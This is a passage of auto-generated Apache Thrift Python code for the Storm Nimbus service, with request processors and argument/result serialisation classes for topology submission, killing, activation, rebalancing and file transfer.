oprot.writeMessageEnd()
oprot.trans.flush()
def process_activate(self, seqid, iprot, oprot):
args = activate_args()
args.read(iprot)
iprot.readMessageEnd()
result = activate_result()
try:
self._handler.activate(args.name)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("activate", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deactivate(self, seqid, iprot, oprot):
args = deactivate_args()
args.read(iprot)
iprot.readMessageEnd()
result = deactivate_result()
try:
self._handler.deactivate(args.name)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("deactivate", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_rebalance(self, seqid, iprot, oprot):
args = rebalance_args()
args.read(iprot)
iprot.readMessageEnd()
result = rebalance_result()
try:
self._handler.rebalance(args.name, args.options)
except NotAliveException as e:
result.e = e
except InvalidTopologyException as ite:
result.ite = ite
oprot.writeMessageBegin("rebalance", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_beginFileUpload(self, seqid, iprot, oprot):
args = beginFileUpload_args()
args.read(iprot)
iprot.readMessageEnd()
result = beginFileUpload_result()
result.success = self._handler.beginFileUpload()
oprot.writeMessageBegin("beginFileUpload", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_uploadChunk(self, seqid, iprot, oprot):
args = uploadChunk_args()
args.read(iprot)
iprot.readMessageEnd()
result = uploadChunk_result()
self._handler.uploadChunk(args.location, args.chunk)
oprot.writeMessageBegin("uploadChunk", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_finishFileUpload(self, seqid, iprot, oprot):
args = finishFileUpload_args()
args.read(iprot)
iprot.readMessageEnd()
result = finishFileUpload_result()
self._handler.finishFileUpload(args.location)
oprot.writeMessageBegin("finishFileUpload", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_beginFileDownload(self, seqid, iprot, oprot):
args = beginFileDownload_args()
args.read(iprot)
iprot.readMessageEnd()
result = beginFileDownload_result()
result.success = self._handler.beginFileDownload(args.file)
oprot.writeMessageBegin("beginFileDownload", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_downloadChunk(self, seqid, iprot, oprot):
args = downloadChunk_args()
args.read(iprot)
iprot.readMessageEnd()
result = downloadChunk_result()
result.success = self._handler.downloadChunk(args.id)
oprot.writeMessageBegin("downloadChunk", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getNimbusConf(self, seqid, iprot, oprot):
args = getNimbusConf_args()
args.read(iprot)
iprot.readMessageEnd()
result = getNimbusConf_result()
result.success = self._handler.getNimbusConf()
oprot.writeMessageBegin("getNimbusConf", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getClusterInfo(self, seqid, iprot, oprot):
args = getClusterInfo_args()
args.read(iprot)
iprot.readMessageEnd()
result = getClusterInfo_result()
result.success = self._handler.getClusterInfo()
oprot.writeMessageBegin("getClusterInfo", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getTopologyInfo(self, seqid, iprot, oprot):
args = getTopologyInfo_args()
args.read(iprot)
iprot.readMessageEnd()
result = getTopologyInfo_result()
try:
result.success = self._handler.getTopologyInfo(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getTopologyInfo", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getTopologyConf(self, seqid, iprot, oprot):
args = getTopologyConf_args()
args.read(iprot)
iprot.readMessageEnd()
result = getTopologyConf_result()
try:
result.success = self._handler.getTopologyConf(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getTopologyConf", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getTopology(self, seqid, iprot, oprot):
args = getTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = getTopology_result()
try:
result.success = self._handler.getTopology(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getUserTopology(self, seqid, iprot, oprot):
args = getUserTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = getUserTopology_result()
try:
result.success = self._handler.getUserTopology(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getUserTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class submitTopology_args:
"""
Attributes:
- name
- uploadedJarLocation
- jsonConf
- topology
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRING, 'uploadedJarLocation', None, None, ), # 2
(3, TType.STRING, 'jsonConf', None, None, ), # 3
(4, TType.STRUCT, 'topology', (StormTopology, StormTopology.thrift_spec), None, ), # 4
)
def __init__(self, name=None, uploadedJarLocation=None, jsonConf=None, topology=None,):
self.name = name
self.uploadedJarLocation = uploadedJarLocation
self.jsonConf = jsonConf
self.topology = topology
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.uploadedJarLocation = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.jsonConf = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.topology = StormTopology()
self.topology.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopology_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.uploadedJarLocation is not None:
oprot.writeFieldBegin('uploadedJarLocation', TType.STRING, 2)
oprot.writeString(self.uploadedJarLocation)
oprot.writeFieldEnd()
if self.jsonConf is not None:
oprot.writeFieldBegin('jsonConf', TType.STRING, 3)
oprot.writeString(self.jsonConf)
oprot.writeFieldEnd()
if self.topology is not None:
oprot.writeFieldBegin('topology', TType.STRUCT, 4)
self.topology.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class submitTopology_result:
"""
Attributes:
- e
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (AlreadyAliveException, AlreadyAliveException.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2
)
def __init__(self, e=None, ite=None,):
self.e = e
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = AlreadyAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ite = InvalidTopologyException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopology_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
if self.ite is not None:
oprot.writeFieldBegin('ite', TType.STRUCT, 2)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class submitTopologyWithOpts_args:
"""
Attributes:
- name
- uploadedJarLocation
- jsonConf
- topology
- options
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRING, 'uploadedJarLocation', None, None, ), # 2
(3, TType.STRING, 'jsonConf', None, None, ), # 3
(4, TType.STRUCT, 'topology', (StormTopology, StormTopology.thrift_spec), None, ), # 4
(5, TType.STRUCT, 'options', (SubmitOptions, SubmitOptions.thrift_spec), None, ), # 5
)
def __init__(self, name=None, uploadedJarLocation=None, jsonConf=None, topology=None, options=None,):
self.name = name
self.uploadedJarLocation = uploadedJarLocation
self.jsonConf = jsonConf
self.topology = topology
self.options = options
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.uploadedJarLocation = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.jsonConf = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.topology = StormTopology()
self.topology.read(iprot)
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRUCT:
self.options = SubmitOptions()
self.options.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopologyWithOpts_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.uploadedJarLocation is not None:
oprot.writeFieldBegin('uploadedJarLocation', TType.STRING, 2)
oprot.writeString(self.uploadedJarLocation)
oprot.writeFieldEnd()
if self.jsonConf is not None:
oprot.writeFieldBegin('jsonConf', TType.STRING, 3)
oprot.writeString(self.jsonConf)
oprot.writeFieldEnd()
if self.topology is not None:
oprot.writeFieldBegin('topology', TType.STRUCT, 4)
self.topology.write(oprot)
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.STRUCT, 5)
self.options.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class submitTopologyWithOpts_result:
"""
Attributes:
- e
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (AlreadyAliveException, AlreadyAliveException.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2
)
def __init__(self, e=None, ite=None,):
self.e = e
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = AlreadyAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ite = InvalidTopologyException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopologyWithOpts_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
if self.ite is not None:
oprot.writeFieldBegin('ite', TType.STRUCT, 2)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopology_args:
"""
Attributes:
- name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
)
def __init__(self, name=None,):
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopology_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopology_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopology_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopologyWithOpts_args:
"""
Attributes:
- name
- options
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRUCT, 'options', (KillOptions, KillOptions.thrift_spec), None, ), # 2
)
def __init__(self, name=None, options=None,):
self.name = name
self.options = options
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.options = KillOptions()
self.options.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopologyWithOpts_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.STRUCT, 2)
self.options.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopologyWithOpts_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopologyWithOpts_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class activate_args:
"""
Attributes:
- name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
)
def __init__(self, name=None,):
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('activate_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class activate_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('activate_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deactivate_args:
"""
Attributes:
- name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
)
def __init__(self, name=None,):
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deactivate_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deactivate_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deactivate_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rebalance_args:
"""
Attributes:
- name
- options
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRUCT, 'options', (RebalanceOptions, RebalanceOptions.thrift_spec), None, ), # 2
)
def __init__(self, name=None, options=None,):
self.name = name
self.options = options
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.options = RebalanceOptions()
self.options.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rebalance_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.STRUCT, 2)
self.options.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rebalance_result:
"""
Attributes:
- e
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2
)
def __init__(self, e=None, ite=None,):
self.e = e
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ite = InvalidTopologyException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rebalance_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
